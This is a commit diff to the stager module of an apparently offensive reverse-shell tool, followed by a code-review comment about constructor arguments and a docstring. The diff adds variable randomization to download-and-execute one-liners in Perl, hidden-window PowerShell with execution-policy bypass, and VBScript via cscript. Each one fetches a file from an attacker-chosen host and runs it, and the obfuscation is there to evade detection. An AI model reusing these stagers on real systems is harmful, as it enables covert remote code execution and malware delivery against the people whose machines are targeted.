Updated stagers to allow for variable randomization and ipfuscation
capnspacehook committed Jul 22, 2018
1 parent ec6b593 commit 9ea325f
Showing 1 changed file with 18 additions and 15 deletions.
33 changes: 18 additions & 15 deletions src/stagers.py
@@ -1,4 +1,5 @@
from shellpop import *
from obfuscators import randomize_vars
from encoders import powershell_base64, xor, to_unicode, to_urlencode
from classes import base64_wrapper, xor_wrapper
from SimpleHTTPServer import SimpleHTTPRequestHandler
Expand Down Expand Up @@ -32,16 +33,18 @@ def start(self):


class HTTPStager(object):
def __init__(self):
def __init__(self, args):
self.payload = None
self.args = None
self.args = args
self.opsec = False # Set to true if it is stealth (hides windows or processes)

def get(self):
"""
Generate the code.
Apply encoding, in the correct order, of course.
"""
self.payload = randomize_vars(self.payload, self.args.obfuscate_small)

# Apply base64 encoding.
self.payload = base64_wrapper(self.name, self.payload, self.args)

Expand All @@ -57,7 +60,7 @@ class Python_HTTP_Stager(HTTPStager):
name = "Python HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -68,11 +71,11 @@ class Perl_HTTP_Stager(HTTPStager):
name = "Perl HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.payload = """perl -e 'use LWP::UserAgent;my $u=new LWP::UserAgent;my $d="http://{0}:{1}/{2}";my $req=new HTTP::Request("GET", $d);my $res=$u->request($req);my $c=$res->content();system $c' """.format(self.host,
self.payload = """perl -e 'use LWP::UserAgent;$VAR1=new LWP::UserAgent;$VAR2="http://{0}:{1}/{2}";$req=new HTTP::Request("GET", $VAR2);$VAR3=$VAR1->request($req);$VAR4=$VAR3->content();system $VAR4' """.format(self.host,
self.port,
filename)

Expand All @@ -81,7 +84,7 @@ class Wget_HTTP_Stager(HTTPStager):
name = "Wget HTTP stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -93,7 +96,7 @@ class Curl_HTTP_Stager(HTTPStager):
name = "cURL HTTP stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -105,31 +108,31 @@ class Powershell_HTTP_Stager(HTTPStager):
name = "Powershell cmd.exe HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.opsec = True
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$p=$x.downloadString('http://{0}:{1}/{2}');cmd.exe /c $p """.format(self.host, self.port, filename)
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $VAR1=new-object net.webclient;$VAR1.proxy=[Net.WebRequest]::GetSystemWebProxy();$VAR1.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$VAR2=$VAR1.downloadString('http://{0}:{1}/{2}');cmd.exe /c $VAR2 """.format(self.host, self.port, filename)


class PurePowershell_HTTP_Stager(HTTPStager):
name = "Pure Powershell HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.opsec = True
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iEx $x.downloadString('http://{0}:{1}/{2}') """.format(self.host, self.port, filename)
self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $VAR1=new-object net.webclient;$VAR1.proxy=[Net.WebRequest]::GetSystemWebProxy();$VAR1.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iEx $VAR1.downloadString('http://{0}:{1}/{2}') """.format(self.host, self.port, filename)


class Certutil_HTTP_Stager(HTTPStager):
name = "CertUtil Windows HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -140,7 +143,7 @@ class BitsAdmin_HTTP_Stager(HTTPStager):
name = "BitsAdmin Windows HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
Expand All @@ -153,11 +156,11 @@ class VbScriptHttpStager(HTTPStager):
name = "VBScript Windows HTTP Stager"

def __init__(self, conn_info, args, filename):
HTTPStager.__init__(self)
HTTPStager.__init__(self, args)
self.args = args
self.host = conn_info[0]
self.port = conn_info[1]
self.payload = """start /wait /b cmd.exe /c echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://{0}:{1}/{2}", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("{2}.bat"); > {2}.js && cscript {2}.js && {2}.bat""".format(self.host, self.port, filename)
self.payload = """start /wait /b cmd.exe /c echo var VAR1 = new ActiveXObject("WinHttp.WinHttpRequest.5.1");VAR1.Open("GET", "http://{0}:{1}/{2}", /*async=*/false);VAR1.Send();VAR2 = new ActiveXObject("ADODB.Stream");VAR2.Type = 1;VAR2.Open();VAR2.Write(VAR1.ResponseBody);VAR2.SaveToFile("{2}.bat"); > {2}.js && cscript {2}.js && {2}.bat""".format(self.host, self.port, filename)


def choose_stager(stagers):
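Review bot: Every subclass constructor still assigns `self.args = args` immediately after `HTTPStager.__init__(self, args)` (Python_HTTP_Stager, Perl_HTTP_Stager, Wget, Curl, both Powershell stagers, Certutil, BitsAdmin and VbScript), even though the base constructor now stores the same value; drop the subclass copies so the attribute has one owner, or call `super(HTTPStager, self).__init__(args)` and rely on it. The `get()` docstring no longer describes the body: it should say that variable names are randomized before any encoding and that the step reads `self.args.obfuscate_small`, e.g. `Randomize variable names (controlled by args.obfuscate_small), then apply encoding in the correct order.`. Because the base signature changed, any HTTPStager subclass outside the visible hunks that still calls `HTTPStager.__init__(self)` would raise a TypeError; the rest of the file is not shown, so confirm none exist. The commit title mentions ipfuscation, but none of the visible hunks touch how the host is rendered, so that change presumably lives elsewhere and is not reviewed here.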
